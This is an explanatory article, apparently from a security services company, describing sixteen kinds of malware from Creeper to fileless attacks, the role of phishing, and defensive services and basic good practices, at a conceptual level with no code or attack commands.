The 16 types of malware used by criminals
Table of Contents
Viruses, Trojans, spyware, ransomware… the types of malware used by malicious actors have multiplied and become more sophisticated
Ransomware to extort money from companies and public administrations, Trojans to steal money from bank accounts, infostealers to gain access to confidential corporate and government information… Attacks using one of the many types of malware have been a leading threat to global cybersecurity for decades.
But what is a malware? According to the US National Institute of Standards and Technology (NIST), one of the global reference institutions for cybersecurity, it is «software or firmware intended to perform an unauthorised process that will adversely impact the confidentiality, integrity or availability of an information system».
This definition allows us to identify the two critical elements of malware, which, moreover, are embedded in the concept itself:
- It is software or firmware.
- Its use is malicious.
What computer systems are affected by the various types of malware? These malicious codes act on computers, tablets, mobile phones and even OT and IoT devices.
What are the goals of malicious actors that use malware to attack companies, institutions or citizens? They are directly related to the types of malware used. The most common objectives are stealing money, obtaining data to commit economic fraud or extortion, obtaining confidential information, damaging reputation or paralysing business continuity.
In this article, we will detail the main types of malware used today, reflect on the role of social engineering, as-a-Service models or AI and analyse the critical cybersecurity services to combat malware.
1. I’m the creeper, catch me if you can! 50 years of playing cat and mouse
In 1971, the first ever malware was born: Creeper. This worm spread through the ARPANET, a computer network created in 1969 by the US Department of Defence to connect computers at universities and research groups. Infected computers were prompted with a message that read: «I’m the creeper, catch me if you can!»
Just one year later, in 1972, experts could prune the creeper, thanks to the creation of The Reaper program, which eliminated the malware.
Thus began an endless competition between malicious actors and cybersecurity experts. The former develop new types of malware and sophisticate existing ones to overcome the systems’ defensive mechanisms. The latter continuously research to discover criminals’ tactics, techniques and procedures (TTPs) and implement strategies to prevent attacks.
This spiral, together with the digital revolution we have experienced in the last half-century, has led to multiple types of malware, from classic viruses, worms and Trojans to ransomware, the most widespread malware in recent years.
Moreover, cybercriminals have endeavoured to hide the use of malware for as long as possible and to persist on infected systems to achieve their criminal goals. This is why areas such as cyber intelligence or threat hunting have become so important in the fight against all types of malware.
After all, the best way to catch malicious actors is to stay one step ahead of them.
2. Viruses and worms – two similar but different types of malware
After Creeper, other types of malware emerged, such as Wabbit (1974), which enabled the first denial-of-service attack; Animal (1975), the first Trojan horse; the first backdoor developed by Ken Thompson (1984); and Brain (1986), the first virus capable of infecting a PC.
Since the 1990s, the emergence of malware has accelerated, and today, new malicious codes are continually emerging to overcome the defensive capabilities of companies and institutions. What are the main types of malware in use today?
2.1. Viruses
A virus is a malicious code hidden in a file downloaded or shared on a computer.
It was one of the most widely used types of malware for decades and is capable of spreading between hosts.
However, to become active it requires the victim to interact with the infected file, for example, by opening a text document with an attached virus.
Once activated, the malware executes its malicious code and infects the system by spreading through it.
Generally, viruses are used by malicious actors to destroy corporate or personal files or cause operational problems.
2.2. Worm
John von Neumann, the most influential mathematician of the 20th century and father of computing, pondered in the last years of his life about the possibility of creating code capable of self-replication. What at the time bordered on science fiction is today a reality. One of the most common types of malware is the computer worm.
This malware can rapidly self-replicate and spread itself across the devices that make up a network.
Like viruses, worms land on a device thanks to an infected file. However, they do not require any further action by the victim. So, activation is the big difference between these two types of malware.
Computer worms create copies of themselves and distribute them through the network to which the attacked device is connected. In this way, they seek to spread through the network, increase traffic and cause disruptions and performance problems in the network and the devices that make it up.
Thus, worms can damage the operability of infected networks and cause the loss of valuable data.
It is also important to note that cybercriminals have been perfecting this kind of malware so that there are worms that resemble the types of malware we will discuss next: Trojans. What does this mean? Not only do they spread to alter traffic, but they can also include a payload that serves to open a backdoor on your computer.
3. It was all invented in Trojan: Types of malware to sneak into computers
3.1. Trojan
The name of this type of malware precisely indicates how it works. Just as the Greeks designed a giant horse to gain entry into the fortified city of Troy and conquer it from within, malicious actors use Trojans to infect devices.
A Trojan pretends to be proper and legitimate software so the user downloads it onto his computer without fear. The Trojan then proceeds to infect the device. For what purposes? To access, modify and even delete sensitive data.
Although when it comes to systematising the different types of malware, sometimes they are not included in the Trojan family, there are some malicious codes with very similar characteristics: backdoor, downloader, dropper, rootkit… All of them have in common that they serve to open the doors of systems and devices to other malware.
3.2. Backdoor
Today, many malicious actors use Trojans to create backdoors on infected computers.
This variety of malware allows a hostile actor to take control of a computer remotely. Once in control, the criminal can perform critical actions such as sending, receiving, executing or deleting files and stealing information.
In addition, backdoors are also used to create botnets, i.e. zombie networks consisting of infected computers that allow malicious actors to perform denial-of-service attacks against websites, platforms or corporate systems.
3.3. Rootkit
A rootkit is malware that perfects the concept of a backdoor. It transforms transient access into a continuously open door for malicious actors to remotely access a device and gain administrator privileges.
With maximum privileges, the rootkit can intercept and manipulate system calls so that the attacker’s presence inside the system goes unnoticed.
The central goal of the most sophisticated rootkits is to reach the operating system kernel or even a higher level of privileges in the firmware.
The most potent rootkits allow criminals to persist even after formatting a disk and reinstalling the operating system, taking control not only of a device but of an entire network, executing commands on computers and making it difficult to detect malicious programs running on devices or systems.
3.4. Dropper
A dropper is malicious software that downloads other malware onto a victim’s device. As we pointed out when explaining Trojans, one of the keys to droppers lies in their appearance of legitimacy. Users download them because they believe they are real programs.
What is the goal of a dropper? To release its payload or, in other words, to install other malware without the user of the targeted device detecting it. If we wax poetic, we could say that a dropper is like a sherpa leaving a climber one step away from the top of a mountain.
The payload of a dropper does not necessarily have to be malware alone but often includes other files and tools to mask the malicious code.
Why use a dropper instead of installing the malware directly? To get past the security checks and make it through the download phase. In addition, more advanced droppers include mechanisms to neutralise system defences, e.g. by disabling notifications to users when they intend to perform actions that affect the system.
3.5. Downloader
Sometimes, the droper is mistaken for the downloader, mainly because both types of malware have the same purpose: to facilitate the execution of malicious code.
Why is a downloader different from a dropper? The downloader does not carry the payload but downloads the malicious components from a remote server. In this way, malicious actors seek to bypass the malware detection mechanisms of devices and systems.
Downloaders also modify the registries of computers infected with the malware they download. For what purpose? To erase the trace and facilitate the persistence of the attack.
4. Spyware: Types of malware used to spy on victims
The days of film noir spies are long gone. Nowadays, espionage is mainly carried out in the digital realm.
That is why cybercriminals have developed various types of malware that serve to spy on the devices and systems of companies, citizens and public institutions.
In fact, since the 1990s, the term spyware has been used to refer to malicious software used to infect computers, mobile phones and other internet-connected devices in order to spy on the people who use them.
Criminals install spyware on devices without the consent of the people using them. Spyware is usually bundled with legitimate programs, files, web pages or mobile apps.
When criminals manage to insert them into operating systems, spyware starts its activity in the background to avoid detection by victims.
Within the spyware category, cybersecurity specialists include some of the most common types of malware used in recent years to steal corporate, government, personal and financial data.
4.1. Stealer
The two most common types of stealers are infostealers and password stealers. As their names suggest, these types of malware are used to steal information stored on a computer or to steal passwords and credentials that allow access to programs, websites or applications.
Like other types of malware, stealers reach victims’ devices through social engineering attacks or as a Trojan payload. Either way, once it starts running on the computer, it proceeds to perform a scan of the computer to collect credentials stored on it, for example, in a browser or in installed software. But they can also obtain other information about the computer and the person using it and even take screenshots of the device.
4.2. Keylogger
A keylogger is software that can record every user’s keystroke on a device. As with other types of malware, keyloggers are not, by definition, malicious software. However, their use by cybercriminals transforms them into weapons.
Why? A malicious actor can use a keylogger to steal critical hardware and software passwords, intercept sensitive information, and even steal credit card or bank account passwords.
Where is a keylogger installed? In the computer’s operating system, at the keyboard API level or in the device’s memory.
It should also be noted that detection is complex, because they generally have no impact on the performance of the infected computer and because keylogger developers are effective at circumventing antivirus software and hiding the presence of the malware.
4.3. Banking Trojan
Given what we have discussed in this article, we can see that the categorisation of the various types of malware is complex not only because they are sometimes used in a hybrid way, but also because they have many elements in common.
An infamous class of malware are banking Trojans. Although they carry the Trojan concept in their name, they can be considered a subtype of spyware.
Malicious actors use banking Trojans to steal the login credentials of their victim’s bank accounts to steal money from them or to use this information to construct fake identities and carry out fraud.
They can disguise themselves as components of the user’s browser by injecting malicious code into the legitimate website of the financial institution.
5. Adware: A pernicious advertising blast
Another type of malware that needs to be addressed is adware. This malicious program has a peculiar mission: to show users of infected computers advertisements that generate financial benefits for the attackers.
This malware can be installed as a program in the operating system or as an extension of the browser used. Once running, it will continuously display unwanted or misleading advertisements to the person using the device, preventing them from discovering the source of the advertising bombardment.
6. Ransomware: Extortion as a business model
Ransomware attacks are one of the biggest threats we face in cybersecurity. In recent years, attacks using this type of malware have multiplied and impacted companies in various economic sectors: finance, industry, health, education, etc.
What does this malware consist of? It is a malicious program that, once it has gained access to a computer, can track files, images, emails and documents. It then encrypts them to prevent the attacked companies or institutions from accessing their data.
Criminals then demand a ransom in exchange for the return of the stolen data and, in addition, threaten their victims with exfiltrating the data or trading it on the Dark Web, which can cause a reputational, economic and legal crisis.
Every week, ransomware attacks are publicised, which, in the worst cases, can bring a company or public entity to a standstill.
The success of this type of malware lies in the fact that it facilitates rapid monetisation of the attack by criminals. In addition, the proliferation of Ransomware-as-a-Service programmes, which package this malware, has allowed attackers without knowledge or resources to launch ransomware campaigns.
7. Wiper: The power of destruction
Of all types of malware, wiper is the one with the most devastating power. This malware is not used to spy on victims, disrupt their operations or hijack their data. Criminals use wipers to delete data, erase the trail of an attack and system events, remove evidence of criminal actions, or simply cause irreparable damage to a system or network.
Therefore, the most common targets of a wiper attack are:
- Companies operating in strategic sectors, such as energy.
- Public institutions.
Consequently, wipers are generally designed and implemented by cybercriminal groups with advanced knowledge and financial resources sponsored by states.
In such a way, wipers function as another tool in a geostrategic conflict, as seen in the Russian invasion of Ukraine.
8. Drainer: Emptying crypto-wallets
Malicious actors are constantly improving the various types of malware and designing new malware variants. The best example of this is the proliferation of crypto drainers.
This type of malware seeks to steal the cryptocurrencies that an investor has in his wallet. This allows us to observe a constant in the behaviour of criminals: to take advantage of the opportunities generated by the emergence of new technologies and changes in society and the economy.
How do crypto drainers reach investors’ wallets? Typically, complex and sophisticated phishing campaigns lead victims to malicious websites that trigger the execution of the malware.
9. Cryptojacking: Using other people’s devices to get rich from cryptocurrency mining
Another cryptocurrency-related malware is cryptojacking. In this case, however, the aim is not to illegitimately steal cryptos from investors’ wallets but rather to infect web servers to inject cryptocurrency mining code into the browser and computers of its victims.
Cryptocurrency mining can be a very lucrative activity. However, purchasing devices requires a significant outlay and is very electricity-intensive.
How do cybercriminals overcome these problems, which reduce the profitability of cryptocurrency mining? By infecting other people’s devices and using their resources and processing power to mine cryptocurrencies without the victims noticing.
What are the consequences of this type of malware for people whose devices are infected? They become slower, deteriorate very quickly, and their electricity bills increase.
Europol recently arrested a criminal who made 1.8 million euros by using crpytojacking to mine cryptocurrencies at no cost.
10. Fileless: The dangers of fileless malware
As we said at the beginning of this guide to the different types of malware, over the last 50 years, cybercriminals have evolved malware to undermine companies’ defensive capabilities and achieve their goals. The result of this criminal innovation is the development of fileless. In other words, a class of malware that does not require the victim to download any files in order to infect their device.
This malware uses tools in the systems themselves and infects applications’ memory to open a backdoor and make it easier to execute code remotely.
So, firstly, fileless, like spyware or ransomware, aim to be persistent on the systems they infect and go undetected, so they often infiltrate software and applications that victims trust. Secondly, they are generally used to steal critical information, such as financial data or confidential information, from companies or institutions.
Today, cybercriminals have designed variants of most types of malware that are fileless: rootkits, ransomware, etc., all to leave as little trace as possible on the attacked systems and evade detection by the new generation of antivirus and EDRs.
11. The hybridisation of malware has made attacks more complex
In addition to designing new types of malware and evolving malware, malicious actors have become more sophisticated in designing cyberattacks over the decades.
As a result, it is now common for a single attack to employ several types of malware at the same time or in a concatenated manner.
For example, a criminal group may use a Trojan with a ransomware payload and then use a wiper to erase its trail and remove any evidence.
The main consequence of malware hybridisation is that the detection of security incidents becomes extraordinarily complex, as the ability of malicious actors to persist on an infected system without attracting the attention of detection mechanisms increases dramatically.
The more complex the criminals’ strategies to achieve their goals are, the more effort cyber security professionals have to put into discovering the malicious actors’ techniques, tactics and procedures and putting in place the necessary measures to make them inffective. In other words, if the mouse hides extraordinarily effectively, the cat has to work harder and sharpen its wits to find it.
12. Social engineering: The big gateway for all types of malware
Beyond the combined use of various malware, we must focus on the relationship between malware and social engineering techniques such as phishing.
Most cyber-attacks have a social engineering dimension, especially regarding the attack vector. Hence, it is common to use phishing as a spearhead to break into the computers, networks, and systems that are to be attacked.
2024 has started with disturbing news: Microsoft has detected that an Iranian Advanced Persistent Threat (APT) group is trying to attack researchers in Europe and the United States using spear-phishing techniques to infect their computers with a backdoor called MediaPl. This program can exchange information with a command and control (c2) server while masquerading as the Windows player to avoid detection.
In light of what we have unpacked in this article, we can see that social engineering is essential to get victims to perform actions that allow the malicious code to execute, whether it is downloading a file, executing a file, clicking on a link or downloading a fake web or mobile application.
13. Cybersecurity to deal with the multiple types of malware
What can companies and public administrations do to prevent malware from causing a security incident that leads to significant financial loss, legal repercussions and reputational damage? Entrust the pursuit of the mice, i.e. the malicious actors, to the cats, i.e. the cybersecurity experts.
13.1. Critical cybersecurity services
To prevent, detect and mitigate malware attacks, professionals can put in place essential cybersecurity services such as:
- Social engineering testing aims to raise awareness and train all professionals in an organisation.
- Testing of web security, mobile applications, IoT devices, cloud infrastructures and code audits to assess their security and detect vulnerabilities that malicious actors can exploit.
- Red Team scenarios focused on various types of malware to train defence teams and assess the effectiveness of measures to prevent, detect and respond to ransomware and other malware attacks to improve them continually.
- Threat Hunting services to anticipate malicious actions by understanding the latest techniques, tactics and procedures employed by criminals and optimising detection capabilities.
- Incident response services to limit the impact of malware, expel malicious actors and help organisations get back to business as usual in the shortest possible time and with maximum guarantees.
13.2. Good practices in cybersecurity
Beyond implementing these cybersecurity services, organisations should promote good cybersecurity practices among all their professionals. How? By applying the basic recommendations proposed by cybersecurity experts:
- Do not download software from untrusted sources.
- Use only authorised applications.
- Update all software continuously to apply security patches developed by vendors.
- Have an antivirus installed on all computers.
- Limit user privileges as much as possible.
In short, the current threat landscape is dominated by multiple types of malware that can cause severe damage, especially as malware is becoming increasingly sophisticated and the techniques, tactics and procedures used by criminals are continually becoming more complex in order to defeat organisations’ security mechanisms.
Therefore, companies and administrations must treat the malware epidemic as a strategic issue and use cybersecurity services to prepare for this kind of attack.
A company must ask itself not whether it will suffer an attack that seeks to infect its computers with malware but rather, «Are we prepared to deal with the attack successfully?»